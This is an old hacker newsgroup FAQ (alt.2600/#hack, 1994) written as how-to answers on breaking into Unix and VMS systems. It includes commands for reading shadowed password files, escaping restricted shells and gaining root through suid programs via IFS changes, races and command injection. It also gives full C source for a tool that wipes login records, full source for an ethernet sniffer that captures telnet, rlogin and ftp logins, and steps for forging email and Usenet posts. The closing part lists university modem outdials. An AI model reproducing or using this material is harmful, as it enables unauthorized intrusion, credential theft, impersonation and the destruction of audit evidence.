From will@gnu.ai.mit.edu (Will Spencer) Newsgroups: alt.2600,alt.answers,news.answers Subject: alt.2600 FAQ, Beta .010 - Part 1/1 Followup-To: alt.2600 Reply-To: will@gnu.ai.mit.edu (FAQ Comments address) Summary: This posting contains a list of Frequently Asked Questions (and their answers) about hacking. It should be read by anyone who wishes to post to the alt.2600 newsgroup or use the IRC channel #hack. Archive-name: alt-2600-faq Posting-Frequency: Random Last-Modified: 1994/12/18 Version: Beta .010 Editors Note: Welcome to Beta .010 of the alt.2600/#hack FAQ! Eleet greets go out to Outsider for producing an excellent WWW version of this document at: http://www.engin.umich.edu/~jgotts/hack-faq.html The purpose of this FAQ is to give you a general introduction to the topics covered in alt.2600 and #hack. No document will make you a hacker. If you have a questions regarding any of the topics covered in the FAQ, please direct it to alt.2600 or #hack. Please do not e-mail me with them, I'm getting swamped. If your copy of the #hack FAQ does not end with the letters EOT on a line by themselves, you do not have the entire FAQ. ** BETA ** Beta Revision .010 alt.2600/#Hack F.A.Q. A TNO Communication Production by Voyager will@gnu.ai.mit.edu Sysop of Hacker's Haven (303)343-4053 With special thanks to: A-Flat, Al, Aleph1, Bluesman, C-Curve, DeadKat, Edison, Hobbit, KCrow, Major, Marauder, Novocain, Outsider, Presence, Rogue Agent, sbin, Taran King, Tomes and TheSaint. We work in the dark We do what we can We give what we have Our doubt is our passion, and our passion is our task The rest is the madness of art. -- Henry James Section A: Computers 01. How do I access the password file under Unix? U 02. How do I crack Unix passwords? 03. What is password shadowing? 04. Where can I find the password file if it's shadowed? 05. What is NIS/yp? 06. What are those weird characters after the comma in my passwd file? 07. How do I access the password file under VMS? 08. How do I crack VMS passwords? 09. How do I break out of a restricted shell? 10. How do I gain root from a suid script or program? 11. How do I erase my presence from the system logs? 12. How do I send fakemail? 13. How do I fake posts to UseNet? 14. How do I hack ChanOp on IRC? 15. How do I modify the IRC client to hide my real username? U 16. How to I change to directories with strange characters in them? 17. What is ethernet sniffing? 18. What is an Internet Outdial? 19. What are some Internet Outdials? U 20. What is this system? U 21. What are the default accounts for XXX ? 22. What port is XXX on? 23. What is a trojan/worm/virus/logic bomb? U 24. How can I protect myself from virii and such? 25. What is Cryptoxxxxxxx? 26. What is PGP? U 27. What is Tempest? 28. What is an anonymous remailer? 29. What are the addresses of some anonymous remailers? 30. How do I defeat copy protection? 31. What is 127.0.0.1? Section B: Telephony U 01. What is a Red Box? U 02. How do I build a Red Box? 03. Where can I get a 6.5536Mhz crystal? 04. Which payphones will a Red Box work on? N 05. How do I make local calls with a Red Box? U 06. What is a Blue Box? 07. Do Blue Boxes still work? 08. What is a Black Box? U 09. What do all the colored boxes do? 10. What is an ANAC number? 11. What is the ANAC number for my area? 12. What is a ringback number? U 13. What is the ringback number for my area? 14. What is a loop? U 15. What is a loop in my area? U 16. What is a CNA number? U 17. What is the telephone company CNA number for my area? U 18. What are some numbers that always ring busy? U 19. What are some numbers that temporarily disconnect phone service? 20. What is scanning? 21. Is scanning illegal? 22. Where can I purchase a lineman's handset? 23. What are the DTMF frequencies? 24. What are the frequencies of the telephone tones? U 25. What are all of the * codes? 26. What frequencies do cordless phones operate on? Section C: Resources U 01. What are some ftp sites of interest to hackers? U 02. What are some newsgroups of interest to hackers? U 03. What are some telnet sites of interest to hackers? U 04. What are some gopher sites of interest to hackers? U 05. What are some World wide Web (WWW) sites of interest to hackers? 06. What are some IRC channels of interest to hackers? U 07. What are some BBS's of interest to hackers? U 08. What books are available on this subject? U 09. What are some mailing lists of interest to hackers? U 10. What are some print magazines of interest to hackers? U 11. What are some organizations of interest to hackers? 12. Where can I purchase a magnetic stripe encoder/decoder? N 13. What are the rainbow books and how can I get them? Section D: 2600 01. What is alt.2600? 02. What does "2600" mean? 03. Are there on-line versions of 2600 available? 04. I can't find 2600 at any bookstores. What can I do? 05. Why does 2600 cost more to subscribe to than to buy at a newsstand? Section E: Miscellaneous 01. What does XXX stand for? 02. How do I determine if I have a valid credit card number? 03. What bank issued this credit card? 04. What are the ethics of hacking? U 05. Where can I get a copy of the alt.2600/#hack FAQ? U == Updated since last release of the #hack FAQ N == New since last release of the #hack FAQ Section A: Computers ~~~~~~~~~~~~~~~~~~~~ 01. How do I access the password file under Unix? In standard Unix the password file is /etc/passwd. On a Unix system with either NIS/yp or password shadowing, much of the password data may be elsewhere. 02. How do I crack Unix passwords? Contrary to popular belief, Unix passwords cannot be decrypted. Unix passwords are encrypted with a one way function. The login program encrypts the text you enter at the "password:" prompt and compares that encrypted string against the encrypted form of your password. Password cracking software uses wordlists. Each word in the wordlist is encrypted and the results are compared to the encrypted form of the target password. The best cracking program for Unix passwords is currently Crack by Alec Muffett. For PC-DOS, the best package to use is currently CrackerJack. 03. What is password shadowing? Password shadowing is a security system where the encrypted password field of /etc/passwd is replaced with a special token and the encrypted password is stored in a separate file which is not readable by normal system users. To defeat password shadowing on many (but not all) systems, write a program that uses successive calls to getpwent() to obtain the password file. Example: #include main() { struct passwd *p; while(p=getpwent()) printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd, p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell); } 04. Where can I find the password file if it's shadowed? Unix Path Token ----------------------------------------------------------------- AIX 3 /etc/security/passwd ! or /tcb/auth/files// A/UX 3.0s /tcb/files/auth/?/* BSD4.3-Reno /etc/master.passwd * ConvexOS 10 /etc/shadpw * ConvexOS 11 /etc/shadow * DG/UX /etc/tcb/aa/user/ * EP/IX /etc/shadow x HP-UX /.secure/etc/passwd * IRIX 5 /etc/shadow x Linux 1.1 /etc/shadow * OSF/1 /etc/passwd[.dir|.pag] * SCO Unix #.2.x /tcb/auth/files// SunOS4.1+c2 /etc/security/passwd.adjunct ##username SunOS 5.0 /etc/shadow System V Release 4.0 /etc/shadow x System V Release 4.2 /etc/security/* database Ultrix 4 /etc/auth[.dir|.pag] * UNICOS /etc/udb * 05. What is NIS/yp? NIS (Network Information System) in the current name for what was once known as yp (Yellow Pages). The purpose for NIS is to allow many machines on a network to share configuration information, including password data. NIS is not designed to promote system security. If your system uses NIS you will have a very short /etc/passwd file that includes a line that looks like this: +::0:0::: To view the real password file use this command "ypcat passwd" 06. What are those weird characters after the comma in my passwd file? The characters are password aging data. Password aging forces the user to change passwords after a System Administrator specified period of time. Password aging can also force a user to keep a password for a certain number of weeks before changing it. ] ] Sample entry from /etc/passwd with password aging installed: ] ] will:5fg63fhD3d,M.z8:9406:12:Will Spencer:/home/fsg/will:/bin/bash ] Note the comma in the encrypted password field. The characters after the comma are used by the password aging mechanism. ] ] Password aging characters from above example: ] ] M.z8 ] The four characters are interpreted as follows: 1: Maximum number of weeks a password can be used without changing. 2: Minimum number of weeks a password must be used before changing. 3&4: Last time password was changed, in number of weeks since 1970. Three special cases should be noted: If the first and second characters are set to '..' the user will be forced to change his/her passwd the next time he/she logs in. The passwd program will then remove the passwd aging characters, and the user will not be subjected to password aging requirements again. If the third and fourth characters are set to '..' the user will be forced to change his/her passwd the next time he/she logs in. Password aging will then occur as defined by the first and second characters. If the first character (MAX) is less than the second character (MIN), the user is not allowed to change his/her password. Only root can change that users password. It should also be noted that the su command does not check the password aging data. An account with an expired password can be su'd to without being forced to change the password. Password Aging Codes +------------------------------------------------------------------------+ | | | Character: . / 0 1 2 3 4 5 6 7 8 9 A B C D E F G H | | Number: 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 | | | | Character: I J K L M N O P Q R S T U V W X Y Z a b | | Number: 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 | | | | Character: c d e f g h i j k l m n o p q r s t u v | | Number: 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 | | | | Character: w x y z | | Number: 60 61 62 63 | | | +------------------------------------------------------------------------+ 07. How do I access the password file under VMS? Under VMS, the password file is SYS$SYSTEM:SYSUAF.DAT. However, unlike Unix, most users do not have access to read the password file. 08. How do I crack VMS passwords? Write a program that uses the SYS$GETUAF functions to compare the results of encrypted words against the encrypted data in SYSUAF.DAT. Two such programs are known to exist, CHECK_PASSWORD and GUESS_PASSWORD. 09. How do I break out of a restricted shell? On poorly implemented restricted shells you can break out of the restricted environment by running a program that features a shell function. A good example is vi. Run vi and use this command: :set shell=/bin/sh then shell using this command: :shell 10. How do I gain root from a suid script or program? 1. Change IFS. If the program calls any other programs using the system() function call, you may be able to fool it by changing IFS. IFS is the Internal Field Separator that the shell uses to delimit arguments. If the program contains a line that looks like this: system("/bin/date") and you change IFS to '/' the shell will them interpret the proceeding line as: bin date Now, if you have a program of your own in the path called "bin" the suid program will run your program instead of /bin/date. To change IFS, use this command: IFS='/';export IFS # Bourne Shell setenv IFS '/' # C Shell export IFS='/' # Korn Shell 2. link the script to -i Create a symbolic link named "-i" to the program. Running "-i" will cause the interpreter shell (/bin/sh) to start up in interactive mode. This only works on suid shell scripts. Example: % ln suid.sh -i % -i # 3. Exploit a race condition Replace a symbolic link to the program with another program while the kernel is loading /bin/sh. Example: nice -19 suidprog ; ln -s evilprog suidroot 4. Send bad input to the program. Invoke the name of the program and a separate command on the same command line. Example: suidprog ; id 11. How do I erase my presence from the system logs? Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text files that can be edited by hand with vi, you must use a program specifically written for this purpose. Example: #include #include #include #include #include #include #include #include #define WTMP_NAME "/usr/adm/wtmp" #define UTMP_NAME "/etc/utmp" #define LASTLOG_NAME "/usr/adm/lastlog" int f; void kill_utmp(who) char *who; { struct utmp utmp_ent; if ((f=open(UTMP_NAME,O_RDWR))>=0) { while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 ) if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof( utmp_ent )); lseek (f, -(sizeof (utmp_ent)), SEEK_CUR); write (f, &utmp_ent, sizeof (utmp_ent)); } close(f); } } void kill_wtmp(who) char *who; { struct utmp utmp_ent; long pos; pos = 1L; if ((f=open(WTMP_NAME,O_RDWR))>=0) { while(pos != -1L) { lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND); if (read (f, &utmp_ent, sizeof (struct utmp))<0) { pos = -1L; } else { if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof(struct utmp )); lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND); write (f, &utmp_ent, sizeof (utmp_ent)); pos = -1L; } else pos += 1L; } } close(f); } } void kill_lastlog(who) char *who; { struct passwd *pwd; struct lastlog newll; if ((pwd=getpwnam(who))!=NULL) { if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) { lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0); bzero((char *)&newll,sizeof( newll )); write(f, (char *)&newll, sizeof( newll )); close(f); } } else printf("%s: ?\n",who); } main(argc,argv) int argc; char *argv[]; { if (argc==2) { kill_lastlog(argv[1]); kill_wtmp(argv[1]); kill_utmp(argv[1]); printf("Zap2!\n"); } else printf("Error.\n"); } 12. How do I send fakemail? Telnet to port 25 of the machine you want the mail to appear to originate from. Enter your message as in this example: HELO bellcore.com MAIL FROM:Voyager@bellcore.com RCPT TO:president@whitehouse.gov DATA Please discontinue your silly Clipper initiative. . QUIT On systems that have RFC 931 implemented, spoofing your "MAIL FROM:" line will not work. Test by sending yourself fakemail first. For more informationm read RFC 822 "Standard for the format of ARPA Internet text messages." 13. How do I fake posts to UseNet? Use inews to post. Give inews the following lines: From: Newsgroups: Subject: Message-ID: Date: Organization: For a moderated newsgroup, inews will also require this line: Approved: Then add your post and terminate with . Example: From: Eric S. Real Newsgroups: alt.hackers Subject: Pathetic bunch of wannabe losers Message-ID: Date: Fri, 13 Aug 1994 12:15:03 Organization: Moral Majority A pathetic bunch of wannabe losers is what most of you are, with no right to steal the honorable title of `hacker' to puff up your silly adolescent egos. Get stuffed, get lost, and go to jail. Eric S. Real ^D Note that many systems will append an Originator: line to your message header, effectively revealing the account from which the message was posted. 14. How do I hack ChanOp on IRC? Find a server that is split from the rest of IRC and create your own channel there using the name of the channel you want ChanOp on. When that server reconnects to the net, you will have ChanOp on the real channel. If you have ServerOp on a server, you can cause it to split on purpose. 15. How do I modify the IRC client to hide my real username? Get the IRC client from cs.bu.edu /irc/clients. Look at the source code files irc.c and ctcp.c. The code you are looking for is fairly easy to spot. Change it. Change the username code in irc.c and the ctcp information code in ctcp.c. Compile and run your client. Here are the diffs from a sample hack of the IRC client. Your client code will vary slightly depending on what IRC client version you are running. *** ctcp.c.old Wed Feb 10 10:08:05 1993 --- ctcp.c Fri Feb 12 04:33:55 1993 *************** *** 331,337 **** struct passwd *pwd; long diff; int uid; ! char c; /* * sojge complained that ircII says 'idle 1 seconds' --- 331,337 ---- struct passwd *pwd; long diff; int uid; ! char c, *fing; /* * sojge complained that ircII says 'idle 1 seconds' *************** *** 348,354 **** if (uid != DAEMON_UID) { #endif /* DAEMON_UID */ ! if (pwd = getpwuid(uid)) { char *tmp; --- 348,356 ---- if (uid != DAEMON_UID) { #endif /* DAEMON_UID */ ! if (fing = getenv("IRCFINGER")) ! send_ctcp_reply(from, ctcp->name, fing, diff, c); ! else if (pwd = getpwuid(uid)) { char *tmp; *** irc.c.old Wed Feb 10 06:33:11 1993 --- irc.c Fri Feb 12 04:02:11 1993 *************** *** 510,516 **** malloc_strcpy(&my_path, "/"); if (*realname == null(char)) strmcpy(realname, "*Unknown*", REALNAME_LEN); ! if (*username == null(char)) { if (ptr = getenv("USER")) strmcpy(username, ptr, NAME_LEN); --- 510,518 ---- malloc_strcpy(&my_path, "/"); if (*realname == null(char)) strmcpy(realname, "*Unknown*", REALNAME_LEN); ! if (ptr = getenv("IRCUSER")) ! strmcpy(username, ptr, NAME_LEN); ! else if (*username == null(char)) { if (ptr = getenv("USER")) strmcpy(username, ptr, NAME_LEN); 16. How to I change to directories with strange characters in them? These directories are often used by people trying to hide information, most often warez (commercial software). There are several things you can do to determine what these strange characters are. One is to use the arguments to the ls command that cause ls to give you more information: From the man page for ls: -F Causes directories to be marked with a trailing ``/'', executable files to be marked with a trailing ``*'', and symbolic links to be marked with a trailing ``@'' symbol. -q Forces printing of non-graphic characters in filenames as the character ``?''. -b Forces printing of non-graphic characters in the \ddd notation, in octal. Perhaps the most useful tool is to simply do an "ls -al filename" to save the directory of the remote ftp site as a file on your local machine. Then you can do a "cat -t -v -e filename" too see exactly what those bizarre little characters are. From the man page for cat: -v Causes non-printing characters (with the exception of tabs, newlines, and form feeds) to be displayed. Control characters are displayed as ^X (x), where X is the key pressed with the key (for example, m is displayed as ^M). The character (octal 0177) is printed as ^?. Non-ASCII characters (with the high bit set) are printed as M -x, where x is the character specified by the seven low order bits. -t Causes tabs to be printed as ^I and form feeds as ^L. This option is ignored if the -v option is not specified. -e Causes a ``$'' character to be printed at the end of each line (prior to the new-line). This option is ignored if the -v option is not set. If the directory name includes a or a you will need to enclose the entire directory name in quotes. Example: cd ".." On an IBM-PC, you may enter these special characters by holding down the key and entering the decimal value of the special character on your numeric keypad. When you release the key, the special character should appear on your screen. An ASCII chart can be very helpful. Sometimes people will create directories with some of the standard stty control characters in them, such as ^Z (suspend) or ^C (intr). To get into those directories, you will first need to user stty to change the control character in qustion to another character. From the man page for stty: Control assignments control-character C Sets control-character to C, where control-character is erase, kill, intr (interrupt), quit, eof, eol, swtch (switch), start, stop or susp. start and stop are available as possible control char- acters for the control-character C assignment. If C is preceded by a caret (^) (escaped from the shell), then the value used is the corresponding con- trol character (for example, ^D is a d; ^? is interpreted as DELETE and ^- is interpreted as unde- fined). Use the stty -a command to see your current stty settings, and to determine which one is causing you problems. 17. What is ethernet sniffing? Ethernet sniffing is listening (with software) to the raw ethernet device for packets that interest you. When your software sees a packet that fits certain criteria, it logs it to a file. The most common criteria for an interesting packet is one that contains words like "login" or "password." Many ethernet sniffers are available, here are a few that may be on your system now: OS Sniffer ~~ ~~~~~~~ HP/UX nettl (monitor) & netfmt (display) nfswatch /* Available via anonymous ftp */ Irix nfswatch /* Available via anonymous ftp */ Etherman SunOS etherfind nfswatch /* Available via anonymous ftp */ Solaris snoop DOS ETHLOAD /* Available via anonymous ftp as */ /* ethld104.zip */ The Gobbler /* Available via anonymous ftp */ LanPatrol LanWatch Netmon Netwatch Netzhack /* Available via anonymous ftp at */ /* mistress.informatik.unibw-muenchen.de */ /* /pub/netzhack.mac */ Macintosh Etherpeek Here is source code for an ethernet sniffer: /* Esniff.c */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define ERR stderr char *malloc(); char *device, *ProgName, *LogName; FILE *LOG; int debug=0; #define NIT_DEV "/dev/nit" #define CHUNKSIZE 4096 /* device buffer size */ int if_fd = -1; int Packet[CHUNKSIZE+32]; void Pexit(err,msg) int err; char *msg; { perror(msg); exit(err); } void Zexit(err,msg) int err; char *msg; { fprintf(ERR,msg); exit(err); } #define IP ((struct ip *)Packet) #define IP_OFFSET (0x1FFF) #define SZETH (sizeof(struct ether_header)) #define IPLEN (ntohs(ip->ip_len)) #define IPHLEN (ip->ip_hl) #define TCPOFF (tcph->th_off) #define IPS (ip->ip_src) #define IPD (ip->ip_dst) #define TCPS (tcph->th_sport) #define TCPD (tcph->th_dport) #define IPeq(s,t) ((s).s_addr == (t).s_addr) #define TCPFL(FLAGS) (tcph->th_flags & (FLAGS)) #define MAXBUFLEN (128) time_t LastTIME = 0; struct CREC { struct CREC *Next, *Last; time_t Time; /* start time */ struct in_addr SRCip, DSTip; u_int SRCport, /* src/dst ports */ DSTport; u_char Data[MAXBUFLEN+2]; /* important stuff :-) */ u_int Length; /* current data length */ u_int PKcnt; /* # pkts */ u_long LASTseq; }; struct CREC *CLroot = NULL; char *Symaddr(ip) register struct in_addr ip; { register struct hostent *he = gethostbyaddr((char *)&ip.s_addr, sizeof(struct in_addr),AF_INET); return( (he)?(he->h_name):(inet_ntoa(ip)) ); } char *TCPflags(flgs) register u_char flgs; { static char iobuf[8]; #define SFL(P,THF,C) iobuf[P]=((flgs & THF)?C:'-') SFL(0,TH_FIN, 'F'); SFL(1,TH_SYN, 'S'); SFL(2,TH_RST, 'R'); SFL(3,TH_PUSH,'P'); SFL(4,TH_ACK, 'A'); SFL(5,TH_URG, 'U'); iobuf[6]=0; return(iobuf); } char *SERVp(port) register u_int port; { static char buf[10]; register char *p; switch(port) { case IPPORT_LOGINSERVER: p="rlogin"; break; case IPPORT_TELNET: p="telnet"; break; case IPPORT_SMTP: p="smtp"; break; case IPPORT_FTP: p="ftp"; break; default: sprintf(buf,"%u",port); p=buf; break; } return(p); } char *Ptm(t) register time_t *t; { register char *p = ctime(t); p[strlen(p)-6]=0; /* strip " YYYY\n" */ return(p); } char *NOWtm() { time_t tm; time(&tm); return( Ptm(&tm) ); } #define MAX(a,b) (((a)>(b))?(a):(b)) #define MIN(a,b) (((a)<(b))?(a):(b)) /* add an item */ #define ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN) { \ register struct CREC *CLtmp = \ (struct CREC *)malloc(sizeof(struct CREC)); \ time( &(CLtmp->Time) ); \ CLtmp->SRCip.s_addr = SIP.s_addr; \ CLtmp->DSTip.s_addr = DIP.s_addr; \ CLtmp->SRCport = SPORT; \ CLtmp->DSTport = DPORT; \ CLtmp->Length = MIN(LEN,MAXBUFLEN); \ bcopy( (u_char *)DATA, (u_char *)CLtmp->Data, CLtmp->Length); \ CLtmp->PKcnt = 1; \ CLtmp->Next = CLroot; \ CLtmp->Last = NULL; \ CLroot = CLtmp; \ } register struct CREC *GET_NODE(Sip,SP,Dip,DP) register struct in_addr Sip,Dip; register u_int SP,DP; { register struct CREC *CLr = CLroot; while(CLr != NULL) { if( (CLr->SRCport == SP) && (CLr->DSTport == DP) && IPeq(CLr->SRCip,Sip) && IPeq(CLr->DSTip,Dip) ) break; CLr = CLr->Next; } return(CLr); } #define ADDDATA_NODE(CL,DATA,LEN) { \ bcopy((u_char *)DATA, (u_char *)&CL->Data[CL->Length],LEN); \ CL->Length += LEN; \ } #define PR_DATA(dp,ln) { \ register u_char lastc=0; \ while(ln-- >0) { \ if(*dp < 32) { \ switch(*dp) { \ case '\0': if((lastc=='\r') || (lastc=='\n') || lastc=='\0') \ break; \ case '\r': \ case '\n': fprintf(LOG,"\n : "); \ break; \ default : fprintf(LOG,"^%c", (*dp + 64)); \ break; \ } \ } else { \ if(isprint(*dp)) fputc(*dp,LOG); \ else fprintf(LOG,"(%d)",*dp); \ } \ lastc = *dp++; \ } \ fflush(LOG); \ } void END_NODE(CLe,d,dl,msg) register struct CREC *CLe; register u_char *d; register int dl; register char *msg; { fprintf(LOG,"\n-- TCP/IP LOG -- TM: %s --\n", Ptm(&CLe->Time)); fprintf(LOG," PATH: %s(%s) =>", Symaddr(CLe->SRCip),SERVp(CLe->SRCport)); fprintf(LOG," %s(%s)\n", Symaddr(CLe->DSTip),SERVp(CLe->DSTport)); fprintf(LOG," STAT: %s, %d pkts, %d bytes [%s]\n", NOWtm(),CLe->PKcnt,(CLe->Length+dl),msg); fprintf(LOG," DATA: "); { register u_int i = CLe->Length; register u_char *p = CLe->Data; PR_DATA(p,i); PR_DATA(d,dl); } fprintf(LOG,"\n-- \n"); fflush(LOG); if(CLe->Next != NULL) CLe->Next->Last = CLe->Last; if(CLe->Last != NULL) CLe->Last->Next = CLe->Next; else CLroot = CLe->Next; free(CLe); } /* 30 mins (x 60 seconds) */ #define IDLE_TIMEOUT 1800 #define IDLE_NODE() { \ time_t tm; \ time(&tm); \ if(LastTIMENext; \ if(CLe->Time ether_type); if(EtherType < 0x600) { EtherType = *(u_short *)(cp + SZETH + 6); cp+=8; pktlen-=8; } if(EtherType != ETHERTYPE_IP) /* chuk it if its not IP */ return; } /* ugh, gotta do an alignment :-( */ bcopy(cp + SZETH, (char *)Packet,(int)(pktlen - SZETH)); ip = (struct ip *)Packet; if( ip->ip_p != IPPROTO_TCP) /* chuk non tcp pkts */ return; tcph = (struct tcphdr *)(Packet + IPHLEN); if(!( (TCPD == IPPORT_TELNET) || (TCPD == IPPORT_LOGINSERVER) || (TCPD == IPPORT_FTP) )) return; { register struct CREC *CLm; register int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4)); register u_char *p = (u_char *)Packet; p += ((IPHLEN * 4) + (TCPOFF * 4)); if(debug) { fprintf(LOG,"PKT: (%s %04X) ", TCPflags(tcph->th_flags),length); fprintf(LOG,"%s[%s] => ", inet_ntoa(IPS),SERVp(TCPS)); fprintf(LOG,"%s[%s]\n", inet_ntoa(IPD),SERVp(TCPD)); } if( CLm = GET_NODE(IPS, TCPS, IPD, TCPD) ) { CLm->PKcnt++; if(length>0) if( (CLm->Length + length) < MAXBUFLEN ) { ADDDATA_NODE( CLm, p,length); } else { END_NODE( CLm, p,length, "DATA LIMIT"); } if(TCPFL(TH_FIN|TH_RST)) { END_NODE( CLm, (u_char *)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RST" ); } } else { if(TCPFL(TH_SYN)) { ADD_NODE(IPS,IPD,TCPS,TCPD,p,length); } } IDLE_NODE(); } } /* signal handler */ void death() { register struct CREC *CLe; while(CLe=CLroot) END_NODE( CLe, (u_char *)NULL,0, "SIGNAL"); fprintf(LOG,"\nLog ended at => %s\n",NOWtm()); fflush(LOG); if(LOG != stdout) fclose(LOG); exit(1); } /* opens network interface, performs ioctls and reads from it, * passing data to filter function */ void do_it() { int cc; char *buf; u_short sp_ts_len; if(!(buf=malloc(CHUNKSIZE))) Pexit(1,"Eth: malloc"); /* this /dev/nit initialization code pinched from etherfind */ { struct strioctl si; struct ifreq ifr; struct timeval timeout; u_int chunksize = CHUNKSIZE; u_long if_flags = NI_PROMISC; if((if_fd = open(NIT_DEV, O_RDONLY)) < 0) Pexit(1,"Eth: nit open"); if(ioctl(if_fd, I_SRDOPT, (char *)RMSGD) < 0) Pexit(1,"Eth: ioctl (I_SRDOPT)"); si.ic_timout = INFTIM; if(ioctl(if_fd, I_PUSH, "nbuf") < 0) Pexit(1,"Eth: ioctl (I_PUSH \"nbuf\")"); timeout.tv_sec = 1; timeout.tv_usec = 0; si.ic_cmd = NIOCSTIME; si.ic_len = sizeof(timeout); si.ic_dp = (char *)&timeout; if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCSTIME)"); si.ic_cmd = NIOCSCHUNK; si.ic_len = sizeof(chunksize); si.ic_dp = (char *)&chunksize; if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCSCHUNK)"); strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name)); ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0'; si.ic_cmd = NIOCBIND; si.ic_len = sizeof(ifr); si.ic_dp = (char *)𝔦 if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCBIND)"); si.ic_cmd = NIOCSFLAGS; si.ic_len = sizeof(if_flags); si.ic_dp = (char *)&if_flags; if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCSFLAGS)"); if(ioctl(if_fd, I_FLUSH, (char *)FLUSHR) < 0) Pexit(1,"Eth: ioctl (I_FLUSH)"); } while ((cc = read(if_fd, buf, CHUNKSIZE)) >= 0) { register char *bp = buf, *bufstop = (buf + cc); while (bp < bufstop) { register char *cp = bp; register struct nit_bufhdr *hdrp; hdrp = (struct nit_bufhdr *)cp; cp += sizeof(struct nit_bufhdr); bp += hdrp->nhb_totlen; filter(cp, (u_long)hdrp->nhb_msglen); } } Pexit((-1),"Eth: read"); } /* Authorize your proogie,generate your own password and uncomment here */ /* #define AUTHPASSWD "EloiZgZejWyms" */ void getauth() { char *buf,*getpass(),*crypt(); char pwd[21],prmpt[81]; strcpy(pwd,AUTHPASSWD); sprintf(prmpt,"(%s)UP? ",ProgName); buf=getpass(prmpt); if(strcmp(pwd,crypt(buf,pwd))) exit(1); } */ void main(argc, argv) int argc; char **argv; { char cbuf[BUFSIZ]; struct ifconf ifc; int s, ac=1, backg=0; ProgName=argv[0]; /* getauth(); */ LOG=NULL; device=NULL; while((acifr_name; } fprintf(ERR,"Using logical device %s [%s]\n",device,NIT_DEV); fprintf(ERR,"Output to %s.%s%s",(LOG)?LogName:"stdout", (debug)?" (debug)":"",(backg)?" Backgrounding ":"\n"); if(!LOG) LOG=stdout; signal(SIGINT, death); signal(SIGTERM,death); signal(SIGKILL,death); signal(SIGQUIT,death); if(backg && debug) { fprintf(ERR,"[Cannot bg with debug on]\n"); backg=0; } if(backg) { register int s; if((s=fork())>0) { fprintf(ERR,"[pid %d]\n",s); exit(0); } else if(s<0) Pexit(1,"fork"); if( (s=open("/dev/tty",O_RDWR))>0 ) { ioctl(s,TIOCNOTTY,(char *)NULL); close(s); } } fprintf(LOG,"\nLog started at => %s [pid %d]\n",NOWtm(),getpid()); fflush(LOG); do_it(); } 18. What is an Internet Outdial? An Internet outdial is a modem connected to the Internet than you can use to dial out. Normal outdials will only call local numbers. A GOD (Global OutDial) is capable of calling long distance. Outdials are an inexpensive method of calling long distance BBS's. 19. What are some Internet Outdials? Area Address(s) Command(s) ------ ------------------------------- --------------------- 201 128.112.88.0 128.112.88.1 128.112.88.2 128.112.88.3 204 umnet.cc.manitoba.ca "dial12" or "dial24" 206 dialout24.cac.washington.edu 215 wiseowl.ocis.temple.edu atz atdt 9xxxyyyy 129.72.1.59 hayes compat 218 aa28.d.umn.edu cli rlogin modem at "login:" type "modem" modem.d.umn.edu "Hayes" 232 isn.rdns.iastate.edu MODEM [Works!!] atz atdt8xxx-xxxx 303 129.82.100.64 login: modem [need password!] 307 modem.uwyo.edu 129.72.1.59 hayes compat 313 35.1.1.6 "dial2400-aa" or [can't connect] "dial1200-aa" 315 198.36.22.3 "modem" 404 emory.edu .modem8 or .dialout broadband.cc.emory.edu .modem8 or .dialout 128.140.1.239 .modem8|CR or .modem96|CR 412 gate.cis.pitt.edu LAT connect dialout ^E atdt 91k xxx-xxxx 415 128.32.132.250 "dial1" or "dial2" 416 pacx.utcs.utoronto.ca modem atdt 9xxx-xxxx 502 uknet.uky.edu outdial2400 atdt 9xxx-xxxx 510 annex132-1.eecs.berkeley.edu atdt 9,,,,, xxx-xxxx 514 132.204.2.11 externe#9 9xxx-xxxx 515 isn.rdns.iastate.edu login MODEM dial atdt8xxx-yyyy 602 129.219.17.3 atdt8,,,,,xyyyxxxyyyy 129.219.17.3 login: MODEM atdt 8xxx-xxxx 609 129.72.1.59 "Hayes" 128.119.131.110 "Hayes" 128.119.131.111 128.119.131.112 128.119.131.113 128.119.131.114 128.112.131.110 128.112.131.111 128.112.131.112 128.112.131.113 128.112.131.114 the above are hayes 614 ns2400.ircc.ohio-state.edu DIAL [can't connect] 615 dca.utk.edu "dial2400" 617 dialout.lcs.mit.edu 619 dialin.ucsd.edu "dialout" 128.54.30.1 nue 713 128.143.70.101 "connect hayes" 128.249.27.154 c modem96 atdt 9xxx-xxxx 128.249.27.153 " -+ as above +- " modem24.bcm.tmc.edu modem12.bcm.tmc.edu 714 130.191.4.70 atdt 8xxx-xxxx 804 ublan.acc.virginia.edu c hayes 128.143.70.101 connect hayes atdt xxx-xxxx 902 star.ccs.tuns.ca "dialout" [down...] 916 128.120.2.251 "dialout" [down...] 129.137.33.72 [can't connect] ??? dialout1.princeton.edu [can't connect] dswitch.byu.edu "C Modem" [can't connect] modem.cis.uflu.edu [can't connect] r596adi1.uc.edu [can't connect] vtnet1.cns.ut.edu "CALL" or "call" [can't connect] 18.26.0.55 [can't connect] 128.173.5.4 [need password!] 